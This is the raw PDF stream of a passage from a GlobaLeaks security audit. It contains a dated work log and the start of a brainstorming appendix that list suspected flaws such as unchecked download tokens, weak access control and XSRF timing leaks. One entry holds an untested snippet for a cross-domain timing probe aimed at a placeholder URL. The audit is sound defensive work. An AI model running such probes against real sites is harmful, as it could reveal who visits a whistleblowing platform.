Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm .25408 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue H\) If a WB uploads a file, then closes the tab, the file will continue to exist on disk) Tj T* 0 Tw .053798 Tw (\(for how long?\) in ) Tj /F4 10 Tf (plain text) Tj /F1 10 Tf (, even when it is being sent to a receiver with a public key. A possible, but) Tj T* 0 Tw 2.590697 Tw (maybe bad, solution: Do the GPG encryption in JavaScript. I think the "Final Step" anonymity) Tj T* 0 Tw (warning/agreement should be required ) Tj /F4 10 Tf (before ) Tj /F1 10 Tf (the WB is allowed to upload any files.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 468.7441 cm
Q
q
1 0 0 1 62.69291 311.5441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 142.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 130.2 cm
q
BT 1 0 0 1 0 14 Tm 9.90372 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated access to file downloads. ) Tj /F3 10 Tf (rest/api.py ) Tj /F1 10 Tf (binds ) Tj /F3 10 Tf (files.Download ) Tj /F1 10 Tf (to) Tj T* 0 Tw /F3 10 Tf (r'/rtip/') Tj ( ) Tj (+) Tj ( ) Tj (uuid_regexp) Tj ( ) Tj (+) Tj ( ) Tj ('/download/') Tj ( ) Tj (+ uuid_regexp) Tj /F1 10 Tf (. ) Tj /F3 10 Tf (Download ) Tj /F1 10 Tf (has) Tj T* ET
Q
Q
q
1 0 0 1 23 124.2 cm
Q
q
1 0 0 1 23 87 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 425.6898 36 re B*
Q
q
BT 1 0 0 1 0 14 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (tip_id) Tj (,) Tj ( ) Tj (rfile_token) Tj (,) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg (uriargs) Tj (\):) Tj  T* (    ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# tip_id needed to authorized the download) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 87 cm
Q
q
1 0 0 1 23 45 cm
q
BT 1 0 0 1 0 26 Tm 1.937318 Tw 12 TL /F1 10 Tf 0 0 0 rg (but tip_id is never checked: it apparently only has to match ) Tj /F3 10 Tf (uuid_regexp) Tj /F1 10 Tf (. This would mean a) Tj T* 0 Tw 2.03498 Tw (downloader needs only an ) Tj /F3 10 Tf (rfile_token) Tj /F1 10 Tf (. This token is generated by ) Tj /F3 10 Tf (uuid.uuid4\(\) ) Tj /F1 10 Tf (in class) Tj T* 0 Tw /F3 10 Tf (FileToken ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This may call a secure RNG or fall back to an insecure one.) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .221654 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is issue K.\) Can that fallback happen? This question applies to all kinds of id's, since they're by) Tj T* 0 Tw (default generated by ) Tj /F3 10 Tf (uuid ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (models.py ) Tj /F1 10 Tf (line 25.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 311.5441 cm
Q
q
1 0 0 1 62.69291 281.5441 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-06) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 269.5441 cm
Q
q
1 0 0 1 62.69291 269.5441 cm
Q
q
1 0 0 1 62.69291 221.5441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm 2.569213 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file hash/copy loop in ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (files.py ) Tj /F1 10 Tf (doesn't seem like it's doing error) Tj T* 0 Tw .454597 Tw (checking right. \(Correction: the error checking is OK provided there's graceful exception handling by) Tj T* 0 Tw 1.335251 Tw (the caller. We did not check this.\) It looks like it's reading the whole file when a comment says it) Tj T* 0 Tw (should be reading 4kb.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 215.5441 cm
Q
q
1 0 0 1 62.69291 167.5441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm 1.529985 Tw 12 TL /F1 10 Tf 0 0 0 rg (Check for Issue F: does an expiration for a collection or download token, if interrupted by server) Tj T* 0 Tw .199983 Tw (restart, leave the token unexpired and accessible? Code inspection: yes, looks like it. Correction: no,) Tj T* 0 Tw 1.112927 Tw (both the expires ) Tj /F4 10 Tf (and ) Tj /F1 10 Tf (the tokens are in RAM. Trying it: a collection token does work before expiry,) Tj T* 0 Tw (does not after expiry, and does not after server restart.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 161.5441 cm
Q
q
1 0 0 1 7.137795 125.5441 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 23.841 Tw 12 TL /F1 10 Tf 0 0 0 rg (Noticed Chrome complaining in JS console upon loading the main page:) Tj T* 0 Tw 15.33333 Tw /F3 10 Tf (Resource) Tj ( ) Tj (interpreted) Tj ( ) Tj (as) Tj ( ) Tj (Font) Tj ( ) Tj (but) Tj ( ) Tj (transferred) Tj ( ) Tj (with) Tj ( ) Tj (MIME) Tj ( ) Tj (type text/html:) Tj T* 0 Tw ("http://192.168.0.41:8082/components/bootstrap/dist/fonts/glyphicons-halflings-regular.woff".) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 119.5441 cm
Q
q
1 0 0 1 62.69291 95.54408 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .712765 Tw (Noticed usability issue: when sending mail fails, all I see is a message in the console log. \(But well) Tj T* 0 Tw (after writing this, mail did show up.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 89.54408 cm
Q
 
endstream
endobj
% 'R383': class PDFStream 
383 0 obj
% page stream
<< /Length 8480 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 717.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm .931318 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now Issue F.\) What kind of access control exists to distinguish receivers? What stops Receiver A) Tj T* 0 Tw 1.070514 Tw (from being able to access the Tips only Receiver B should see? I've seen it check that the ) Tj /F4 10 Tf (role ) Tj /F1 10 Tf (is) Tj T* 0 Tw .37686 Tw ("receiver", but I haven't seen where it checks ) Tj /F4 10 Tf (which receiver should have access to what) Tj /F1 10 Tf (. The same) Tj T* 0 Tw (goes for whistleblowers.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
Q
q
1 0 0 1 62.69291 675.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.965318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The authors are worried about Denial of Service \(DoS\). Could the hash table DoS attack affect) Tj T* 0 Tw 1.069979 Tw /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (? More info here: ) Tj 0 0 .501961 rg (http://bugs.python.org/issue13703 ) Tj 0 0 0 rg (Seems to be "fixed" in python, but) Tj T* 0 Tw (you maybe you have to explicitly ask for the protection?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
Q
q
1 0 0 1 62.69291 645.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .903314 Tw 12 TL /F1 10 Tf 0 0 0 rg (First noticed ) Tj /F3 10 Tf (app/.htaccess ) Tj /F1 10 Tf (in GLClient. What's it for? \(The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers have since) Tj T* 0 Tw (removed it.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 639.0236 cm
Q
q
1 0 0 1 62.69291 627.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Noticed ) Tj /F3 10 Tf (services.js ) Tj /F1 10 Tf (line 143 defines an unused variable. \(Does JSHint tell you that?\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 621.0236 cm
Q
q
1 0 0 1 62.69291 465.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 141 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 146 Tm 3.190751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated attacks on clock skew between client and server. Besides using a server's time) Tj T* 0 Tw .111627 Tw (\() Tj /F3 10 Tf (int\(time.time\(\)\)) Tj ( ) Tj (-) Tj ( ) Tj (time.timezone) Tj ( ) Tj (+) Tj ( ) Tj (seconds ) Tj /F1 10 Tf (from ) Tj /F3 10 Tf (globaleaks/utils/utility.py) Tj /F1 10 Tf (\)) Tj T* 0 Tw .999069 Tw /F3 10 Tf (app/scripts/services.js ) Tj /F1 10 Tf (line 35 has its test backwards: the expiration action would normally) Tj T* 0 Tw 1.028555 Tw (never occur unless the ) Tj /F3 10 Tf (new) Tj ( ) Tj (Date ) Tj /F1 10 Tf (when the callback is woken exactly equals the server-supplied) Tj T* 0 Tw 2.43561 Tw (time. Does it occur normally? In my testing there was accidental clock skew with the VM, the) Tj T* 0 Tw .483318 Tw (expiration timeout was a 41-bit negative number, and the callback was not called. \(In Chrome; even) Tj T* 0 Tw 1.485318 Tw (though with a small negative number a timeout callback is called immediately. I suspect the very) Tj T* 0 Tw .410514 Tw (large time difference gets truncated into its low-order 32 bits or so.\) Since I see no other case in the) Tj T* 0 Tw .246235 Tw (client of using times from the server, an attack would be limited to causing or suppressing client-side) Tj T* 0 Tw .72784 Tw (logout, or causing ) Tj /F3 10 Tf (setExpiration ) Tj /F1 10 Tf (to repeatedly run via ) Tj /F3 10 Tf (services.js ) Tj /F1 10 Tf (line 50 \(since the test to) Tj T* 0 Tw 2.026412 Tw (stop repetition has the wrong sense\). Client-side logout just presents an error and redirects the) Tj T* 0 Tw 1.351984 Tw (browser to ) Tj /F3 10 Tf (/login) Tj /F1 10 Tf (, except the code refers to a variable not defined in its scope, ) Tj /F3 10 Tf (source_path) Tj /F1 10 Tf (.) Tj T* 0 Tw (This looks like code that's never been run.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 465.0236 cm
Q
q
1 0 0 1 62.69291 435.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 423.0236 cm
Q
q
1 0 0 1 62.69291 423.0236 cm
Q
q
1 0 0 1 62.69291 411.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Meeting with GlobaLeaks developers.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 411.0236 cm
Q
q
1 0 0 1 62.69291 381.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-10) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 369.0236 cm
Q
q
1 0 0 1 62.69291 369.0236 cm
Q
q
1 0 0 1 62.69291 297.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 57 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 62 Tm 1.195814 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Investigated the XSRF cookie. This is in ) Tj /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.090814 Tw /F3 10 Tf (check_xsrf_cookie\(\)) Tj /F1 10 Tf (. Does comparing the token with ) Tj /F3 10 Tf (!= ) Tj /F1 10 Tf (create a useful timing attack? Does) Tj T* 0 Tw 2.079213 Tw (the difference in response time between not having an ) Tj /F3 10 Tf (X-XSRF-TOKEN ) Tj /F1 10 Tf (and having one create) Tj T* 0 Tw .592651 Tw (enough timing difference for another domain to tell if the user has visited the GlobaLeaks instance?) Tj T* 0 Tw .470814 Tw (Where does the XSRF token actually get set? Where is ) Tj /F3 10 Tf (check_xsrf_cookie\(\) ) Tj /F1 10 Tf (called? \(Answer:) Tj T* 0 Tw (it appears to be called ) Tj 0 0 .501961 rg (by Cyclone) Tj 0 0 0 rg (, not by any ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (code.\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 291.0236 cm
Q
q
1 0 0 1 62.69291 255.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .211163 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated the sessions. The sessions are stored in a ) Tj /F3 10 Tf (dict\(\) ) Tj /F1 10 Tf (with the session ID as the key. The) Tj T* 0 Tw 2.956235 Tw (browser sends the session ID in the ) Tj /F3 10 Tf (X-Session ) Tj /F1 10 Tf (header. \(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (:\) Can you use a) Tj T* 0 Tw (side-channel attack to get a session ID?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 255.0236 cm
Q
q
1 0 0 1 62.69291 225.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-11) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 213.0236 cm
Q
q
1 0 0 1 62.69291 213.0236 cm
Q
q
1 0 0 1 62.69291 201.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Confirmed issue E by scripting parallel logins.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 201.0236 cm
Q
q
1 0 0 1 62.69291 171.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-12) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 141.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-13) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 129.0236 cm
Q
q
1 0 0 1 62.69291 129.0236 cm
Q
q
1 0 0 1 62.69291 105.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.484651 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Is the receiver login page vulnerable to user existence checking through timing) Tj T* 0 Tw (attacks as described in ) Tj 0 0 .501961 rg (EPITWA) Tj 0 0 0 rg (?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 99.02362 cm
Q
 
endstream
endobj
% 'R384': class PDFStream 
384 0 obj
% page stream
<< /Length 4532 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 603.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 146.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 110.2 cm
q
BT 1 0 0 1 0 38 Tm .465542 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Could a cross-domain timing attack be used to learn whether the user is logged in) Tj T* 0 Tw .24561 Tw (\(or has visited\) a ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (website or note? This might be ) Tj /F4 10 Tf (made possible by ) Tj /F1 10 Tf (the CSRF protection) Tj T* 0 Tw .675697 Tw (mechanism, since different code paths are executed depending on whether the CSRF cookie is set) Tj T* 0 Tw (or not. Some existing research has been done on this in ) Tj 0 0 .501961 rg (EPITWA) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 23 92.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Here's an brain storm attempt, I haven't tested yet \(may not use APIs correctly\):) Tj T* ET
Q
Q
q
1 0 0 1 23 35 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 445.6898 48 re B*
Q
q
BT 1 0 0 1 0 26 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (<) Tj (script) Tj (>) Tj (var) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (start) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (new) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (Date) Tj 0 0 0 rg (\() Tj (\);) Tj /F6 10 Tf 0 .501961 0 rg (<) Tj (/script) Tj (>) Tj /F3 10 Tf 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (<) Tj (img) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (src=) Tj .729412 .129412 .129412 rg ("${TARGET_CSRF_URL") Tj /F6 10 Tf 0 .501961 0 rg (>) Tj (<) Tj (/img) Tj (>) Tj /F3 10 Tf 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (<) Tj (script) Tj (>) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (var) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (end) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (new) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (Date) Tj 0 0 0 rg (\() Tj (\);) Tj ( ) Tj (console) Tj (.) Tj (log) Tj (\() Tj (end) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (start) Tj (\);) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (<) Tj (/script) Tj (>) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .888221 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the paper, they use the ) Tj /F3 10 Tf (onerror ) Tj /F1 10 Tf (property of the image. The paper also notes that it's possible) Tj T* 0 Tw (even without JavaScript, using the ) Tj /F3 10 Tf (SCRIPT ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (LINK ) Tj /F1 10 Tf (tags.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 603.8236 cm
Q
q
1 0 0 1 62.69291 573.8236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-14) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 561.8236 cm
Q
q
1 0 0 1 62.69291 561.8236 cm
Q
q
1 0 0 1 62.69291 549.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Verified that file downloads also face Issue F.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 549.8236 cm
Q
q
1 0 0 1 62.69291 519.8236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-17) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 489.8236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-18) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 477.8236 cm
Q
q
1 0 0 1 62.69291 477.8236 cm
Q
q
1 0 0 1 62.69291 465.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Split Issues J and K out of Issue F.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 465.8236 cm
Q
q
1 0 0 1 62.69291 435.8236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-19) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 423.8236 cm
Q
q
1 0 0 1 62.69291 423.8236 cm
Q
q
1 0 0 1 62.69291 411.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Timing attack proof of concept.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 411.8236 cm
Q
q
1 0 0 1 62.69291 381.8236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-20) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 375.8236 cm
Q
 
endstream
endobj
% 'R385': class PDFStream 
385 0 obj
% page stream
<< /Length 9137 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix B. Brainstorming Notes) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .569398 Tw (This section contains brainstorming notes that were created in the very early stages of the audit, most of) Tj T* 0 Tw .49936 Tw (them before we began looking at the code. This section hypothesizes vulnerabilities that we did not have) Tj T* 0 Tw (time to consider.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 14 Tm .844488 Tw 12 TL /F1 10 Tf 0 0 0 rg (This section is quite rough, and it also overlaps with our ) Tj 0 0 .501961 rg (Appendix A. Work Log) Tj 0 0 0 rg (, due to a change in our) Tj T* 0 Tw (process during this audit.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
Q
q
1 0 0 1 62.69291 666.0236 cm
Q
q
1 0 0 1 62.69291 654.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Whistleblowers trying "legitimate" channels first will de-anonymize them. Probably out of scope?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
Q
q
1 0 0 1 62.69291 624.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.113555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Use case: Repeated whistleblowing, e.g. user is still employed and wants to continue leaking new) Tj T* 0 Tw (documents as long as possible. Is ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (secure in this model?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 618.0236 cm
Q
q
1 0 0 1 62.69291 582.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .161412 Tw 12 TL /F1 10 Tf 0 0 0 rg (Important to remember: WB needs to remain ) Tj /F4 10 Tf (anonymous) Tj /F1 10 Tf (, even assuming the Node is the adversary.) Tj T* 0 Tw .332651 Tw (By the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (threat model, the submitted data is ) Tj /F4 10 Tf (not ) Tj /F1 10 Tf (expected to remain confidential when the) Tj T* 0 Tw (Node is the adversary.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
Q
q
1 0 0 1 62.69291 540.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
